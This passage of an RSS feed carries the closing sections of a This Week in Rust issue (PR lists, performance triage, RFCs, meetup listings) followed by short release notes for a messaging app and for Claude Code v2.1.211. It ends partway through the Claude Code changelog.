<li><a href="https://github.com/rust-lang/cargo/pull/17202">fix manifest schema generation: <code>TomlDebugInfo</code> enum-variants doesn't renamed</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17198">dont apply host-config gating to stable behavior</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17191">reduce library search path length in new build dir layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17168">reduce rustc <code>-L</code> args used in the new <code>build-dir</code> layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17149">rename <code>-Zno-embed-metadata</code> to <code>-Zembed-metadata=no</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17203">test: fix race in <code>cargo_compile_with_invalid_code_in_deps</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15000">add new lints: <code>rest_pattern_accessible_field</code> and <code>unnecessary_rest_pattern</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16965">new lint: <code>definition_in_module_root</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17343"><code>arbitrary_source_item_ordering</code>: add configurable trait impl item ordering modes</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17387"><code>tests_outside_test_module</code>: put code in backticks in the lint message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17215">count length of the first paragraph by its text</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16980">fix <code>suboptimal_flops</code> false negative with ambiguous float literals</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17416">partly disable <code>unneeded_wildcard_pattern</code> when <code>rest_pattern_accessible_field</code> is enabled</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17404">respect the configured MSRV in <code>implicit_saturating_sub</code>'s <code>if x != 0 { x -= 1 }</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16513">trigger <code>single_element_loop</code> if the block contains only a final expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16808">optimize <code>nonstandard_macro_braces</code> by 99.9683% (1.1b → 351K)</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17381">perf: bail out of the <code>disallowed_methods</code> rule if the disallowed list is empty</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22771">ask for disclosure in AI contributions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22734">add fixes for array length for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22741">add parens in transformed dyn type in ref type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22736">avoid panic in merge imports on trailing path separator</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22654">change some things for <code>#[doc = macro!()]</code> expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22770">clamp cttz const-eval result to type width</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22751">correctly handled cfg'ed tail expr, take 2</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22749">crash on code actions when an unresolved module is present</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22707">crash when computing diagnostics with MIR and error types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22744">don't complete default in default impl</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22283">early late classification of lifetimes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22583">fix <code>render_const_using_debug_impl</code> constructing outdated std layouts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22735">fix proc macros <code>TokenStream::from_str()</code> for doc comments</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22464">hide private fields on hover depending on context</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22753">make lsp-server <code>Response</code> type closer aligned to JSON-RPC</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22535">pretty assoc const when trait in macro</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22747">reimplement <code>crate_supports_no_std</code> syntactic heuristic</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22773">resolve non-plain paths in blocks correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22683">support Cargo 1.97.0 lockfile path setting</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22405">hir-ty: walk container exprs for <code>unused_must_use</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22768">fix onEnter erroneously deleting/interpreting <code>$foo</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22726">suggest code action fixes produced from diagnostics under cursor, even if they have effects elsewhere</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22777">treat library files as truly client immutable</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22534">turn <code>BlockLoc</code> into a tracked struct, take 3</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week many new optimizations landed, making this a very good week for performance.
The only real regression was a fix for a miscompile that will likely be re-landed in the future.</p>
<p>Triage done by <strong>@JonathanBrouwer</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;end=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;absolute=false&amp;stat=instructions%3Au">3659db0d..5503df87</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.3%</td>
<td>[0.2%, 0.4%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.9%</td>
<td>[0.1%, 2.5%]</td>
<td>25</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, -0.2%]</td>
<td>195</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-3.4%</td>
<td>[-92.1%, -0.1%]</td>
<td>174</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, 0.4%]</td>
<td>198</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 10 Improvements, 10 Mixed; 7 of them in rollups
36 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/212da2d63f1edf2ab22293547a99f0fbf8cb68a8/triage/2026/2026-07-13.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3955">Named <code>Fn</code> trait parameters</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159179">enable <code>unreachable_cfg_select_predicates</code> lint as part of <code>unused</code> lint group</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/156906">Stabilize <code>dyn Allocator</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157226">Partially stabilize <code>box_vec_non_null</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/152761">Never break between empty parens</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1015">Enable <code>-Zpolonius=next</code> on nightly</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1014">Enable <code>-Znext-solver</code> on nightly by default for testing</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1012">Stabilizing the state of the debuginfo test suite</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/922">Optimize <code>repr(Rust)</code> enums by omitting tags in more cases involving uninhabited variants.</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/841">Proposal for Adapt Stack Protector for Rust</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3983">bf16 primitive type</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-15 - 2026-08-12 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Tel Aviv-yafo, IL) | <a href="https://www.meetup.com/rust-tlv/events/">Rust 🦀 TLV</a><ul>
<li><a href="https://www.meetup.com/rust-tlv/events/315676843/"><strong>שיחה חופשית ווירטואלית על ראסט</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-08-11 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254776/"><strong>Second Tuesday</strong></a></li>
</ul>
</li>
<li>2026-08-12 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/f2hnzrug"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a><ul>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Bangalore, IN) | <a href="https://discord.gg/VJyv3NfVdw">Embedded Rust Discord</a><ul>
<li><a href="https://discord.gg/6gwCNpFP?event=1526087936234225814"><strong>Silicon Sundays</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Mumbai, IN | <a href="https://luma.com/mumbai">Rust Mumbai</a><ul>
<li><a href="https://luma.com/7ksabwbm/"><strong>​Rust Mumbai — July Meetup 🦀</strong></a></li>
</ul>
</li>
<li>2026-07-26 | Pune, MA, IN | <a href="https://www.meetup.com/rust-pune/events/">Rust Pune</a><ul>
<li><a href="https://www.meetup.com/rust-pune/events/315651505/"><strong>Rust Pune: July 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a><ul>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a><ul>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
</ul>
</li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/rust-london-user-group/events/">Rust London User Group</a><ul>
<li><a href="https://www.meetup.com/rust-london-user-group/events/315612916/"><strong>LDN Talks: July 2026 Antithesis Takeover</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Poland, PL | <a href="https://www.meetup.com/rust-poland-meetup">Rust Poland</a><ul>
<li><a href="https://www.meetup.com/rust-poland-meetup/events/315582674/"><strong>Rust Poland x Kraków #10</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Manchester, GB | <a href="https://www.meetup.com/rust-manchester/events/">Rust Manchester</a><ul>
<li><a href="https://www.meetup.com/rust-manchester/events/315037685/"><strong>Rust Manchester July Code Night</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-18 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315225872/"><strong>North End Rust Lunch, July 18</strong></a></li>
</ul>
</li>
<li>2026-07-21 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314997214/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjckbdc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/315376271/"><strong>Rust LA: Rust in Distributed Systems with Flight Science!</strong></a></li>
</ul>
</li>
<li>2026-07-22 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc/events/">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315636854/"><strong>Rust NYC: Write A Custom Coding Agent and wasm_zero</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582650/"><strong>Porter Square Rust Lunch, July 25</strong></a></li>
</ul>
</li>
<li>2026-07-25 | Brooklyn, NY, US | <a href="https://flowercomputer.com/">Flower</a><ul>
<li><a href="https://partiful.com/e/Vq9fyDNCMSO7ia4ulK5b"><strong>BOG-A-THON 2</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl/events/">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539329/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-08-01 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/315582653/"><strong>Chinatown Rust Lunch, Aug 1</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Boston, MA, US | <a href="https://www.meetup.com/bostonrust/events/">Boston Rust Meetup</a><ul>
<li><a href="https://www.meetup.com/bostonrust/events/314660176/"><strong>Evening Boston Rust Meetup at Red Hat, Aug 4</strong></a></li>
</ul>
</li>
<li>2026-08-06 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust/events/">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/314701905/"><strong>Shipping Temporal: How a Global Rust Ecosystem Built Chrome’s Newest Web API</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-08-08 | São Paulo, SP | <a href="https://luma.com/calendar/cal-bif2oHITU1aVvsr">Rust-SP</a><ul>
<li><a href="https://luma.com/41oiyhtk"><strong>Rust SP - Aug/2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-07-21 | Barton, AU | <a href="https://www.meetup.com/rust-canberra">Canberra Rust User Group</a><ul>
<li><a href="https://www.meetup.com/rust-canberra/events/315307280/"><strong>July Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Perth, AU | <a href="https://www.meetup.com/perth-rust-meetup-group">Rust Perth Meetup Group</a><ul>
<li><a href="https://www.meetup.com/perth-rust-meetup-group/events/315451138/"><strong>Rust Perth: July Meetup!</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne/events/">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039480/"><strong>Rust Melbourne July 2026</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>Thank you for your PR, but please edit the description like you are a chainsaw-wielding maniac that just discovered the sentences are young adults who came to the lake at summer camp after sunset.</p>
</blockquote>
<p>– <a href="https://github.com/rust-lang/rust/pull/159039#issuecomment-4931084997">workingjubilee on Rust github</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1786">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1uxsigp/this_week_in_rust_660/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v8.19.0]]></title>
<description><![CDATA[Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's ...]]></description>
<link>https://tsecurity.de/de/3672076/tools/v8190/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672076/tools/v8190/</guid>
<pubDate>Thu, 16 Jul 2026 01:38:16 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ul>
<li>Group admins can now bring chats to their natural conclusion with the new "End Group" option in group settings. Ending a group prevents group members from sending messages or starting calls, and also disables invites. Now you can make sure everyone stays on the right thread by ending last year's sewing meetup group before stitching a new one together.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2.1.211]]></title>
<description><![CDATA[What's changed

Added --forward-subagent-text flag and CLAUDE_CODE_FORWARD_SUBAGENT_TEXT environment variable to include subagent text and thinking in stream-json output
Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote ch...]]></description>
<link>https://tsecurity.de/de/3672066/downloads/v21211/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672066/downloads/v21211/</guid>
<pubDate>Thu, 16 Jul 2026 01:16:22 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's changed</h2>
<ul>
<li>Added <code>--forward-subagent-text</code> flag and <code>CLAUDE_CODE_FORWARD_SUBAGENT_TEXT</code> environment variable to include subagent text and thinking in stream-json output</li>
<li>Fixed permission previews relayed to chat channels not neutralizing bidirectional-override, zero-width, and look-alike quote characters, so tool inputs cannot visually alter the approval message</li>
<li>Fixed auto mode overriding a PreToolUse hook's <code>ask</code> decision for unsandboxed Bash — a hook <code>ask</code> now floors the decision at a prompt</li>
<li>Fixed parallel Claude Code sessions all logging out simultaneously after wake-from-sleep when many sessions share one credential store</li>
<li>Fixed plugin MCP servers not reconnecting after an idle web session woke, leaving MCP calls failing until the next message</li>
<li>Fixed Claude Code on Vertex and Bedrock attempting the default Opus model at startup and printing a spurious fallback notice when a model is explicitly configured</li>
<li>Fixed subagents spawned with an explicit model override reverting to the parent's model when resumed or sent a follow-up message</li>
<li>Fixed nested <code>.claude/rules/*.md</code> files loading even when setting sources exclude project settings</li>
<li>Fixed file upload validation: filenames ending in a DOS device suffix (<code>.prn</code>) or trailing dot are now accepted, and files with multiple hard links are refused</li>
<li>Fixed file uploads to Claude in Chrome from remote and CLI sessions</li>
<li>Fixed edits that leave the input as "?" being silently swallowed and toggling the shortcuts panel</li>
<li>Fixed a startup hang when the Claude in Chrome extension is enabled but Chrome is not running</li>
<li>Fixed a 300ms delay revealing async content (Settings tabs, Stats, diff views, and other loading states)</li>
<li>Fixed reopening a just-stopped background session from the agents view starting a blank conversation under the same session id</li>
<li>Fixed <code>/loop</code> hiding the session from <code>/resume</code> after a single use</li>
<li>Fixed screen reader users losing the audible terminal bell after <code>/terminal-setup</code> or onboarding terminal setup</li>
<li>Fixed background jobs on LLM gateway auth (<code>ANTHROPIC_AUTH_TOKEN</code> + <code>ANTHROPIC_BASE_URL</code>) coming back "Not logged in" after the daemon respawns them</li>
<li>Fixed <code>claude agents</code> jobs becoming permanently undeletable when git no longer recognizes their worktree — the row now shows why the delete was refused instead of silently reappearing</li>
<li>Fixed <code>/clear</code> not resetting the session cost counter — the statusline's cost now starts at $0 after <code>/clear</code></li>
<li>Fixed Claude in Chrome setup pages failing to open in the browser on Windows</li>
<li>Fixed headless print-mode sessions on Windows crashing or silently exiting when stdin is unreadable</li>
